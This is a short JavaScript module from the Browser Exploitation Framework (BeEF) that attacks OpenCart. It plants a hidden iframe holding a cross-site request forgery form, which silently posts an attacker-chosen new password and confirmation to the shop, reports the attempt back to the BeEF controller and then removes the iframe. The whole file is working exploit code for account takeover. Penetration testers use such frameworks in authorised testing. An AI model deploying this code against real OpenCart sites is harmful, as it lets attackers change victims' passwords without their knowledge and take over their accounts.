beef/modules/exploits/opencart_reset_password/command.js

//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var base     = '<%= @base %>'; 
  var password = '<%= @password %>';

  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
    {'type':'hidden', 'name':'password', 'value':password},
    {'type':'hidden', 'name':'confirm',  'value':password}
  ]);

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(opencart_reset_password_iframe);
  }
  setTimeout("cleanup()", 15000);

});